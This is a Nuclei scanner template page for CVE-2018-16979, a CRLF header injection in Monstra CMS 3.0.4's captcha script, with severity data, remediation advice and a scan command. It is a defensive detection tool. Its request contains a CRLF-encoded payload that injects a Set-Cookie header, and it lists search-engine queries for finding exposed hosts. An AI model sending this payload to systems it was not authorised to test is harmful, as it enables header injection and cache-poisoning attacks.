Skip to content
Nuclei Templates

Monstra CMS 3.0.4 - HTTP Header Injection

ID: CVE-2018-16979

Severity: medium

Author: 0x_Akoko

Tags: cve2018,cve,crlf,mostra,mostracms,cms,monstra,xss

Description

Section titled “Description”

Monstra CMS 3.0.4 is susceptible to HTTP header injection in the plugins/captcha/crypt/cryptographp.php cfg parameter. An attacker can potentially supply invalid input and cause the server to allow redirects to attacker-controlled domains, perform cache poisoning, and/or allow improper access to virtual hosts not intended for this purpose. This is a related issue to CVE-2012-2943.

YAML Source

Section titled “YAML Source”
id: CVE-2018-16979


info:
  name: Monstra CMS 3.0.4 - HTTP Header Injection
  author: 0x_Akoko
  severity: medium
  description: |
    Monstra CMS 3.0.4 is susceptible to HTTP header injection in the plugins/captcha/crypt/cryptographp.php cfg parameter. An attacker can potentially supply invalid input and cause the server to allow redirects to attacker-controlled domains, perform cache poisoning, and/or allow improper access to virtual hosts not intended for this purpose. This is a related issue to CVE-2012-2943.
  impact: |
    This vulnerability can lead to various attacks such as session hijacking, cross-site scripting (XSS), and remote code execution (RCE).
  remediation: |
    Upgrade Monstra CMS to version 3.0.5 or later to mitigate the HTTP Header Injection vulnerability.
  reference:
    - https://github.com/howchen/howchen/issues/4
    - https://nvd.nist.gov/vuln/detail/CVE-2018-16979
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2018-16979
    cwe-id: CWE-113
    epss-score: 0.00141
    epss-percentile: 0.48943
    cpe: cpe:2.3:a:monstra:monstra:3.0.4:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: monstra
    product: monstra
    shodan-query: http.favicon.hash:419828698
    fofa-query: icon_hash=419828698
  tags: cve2018,cve,crlf,mostra,mostracms,cms,monstra,xss


http:
  - method: GET
    path:
      - "{{BaseURL}}/plugins/captcha/crypt/cryptographp.php?cfg=1%0D%0ASet-Cookie:%20crlfinjection=1"


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'new line detected in'
          - 'cryptographp.php'
        condition: and


      - type: status
        status:
          - 200
# digest: 4a0a00473045022100f755afe7a4597e50178fd49c3d2b99f4dfc6b9cc364cebb38c28f69d9443903602207b811f6839029768df71d8654f5c2e0d9404efbcdb1a131230fb6acd9be931e8:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2018/CVE-2018-16979.yaml"

View on Github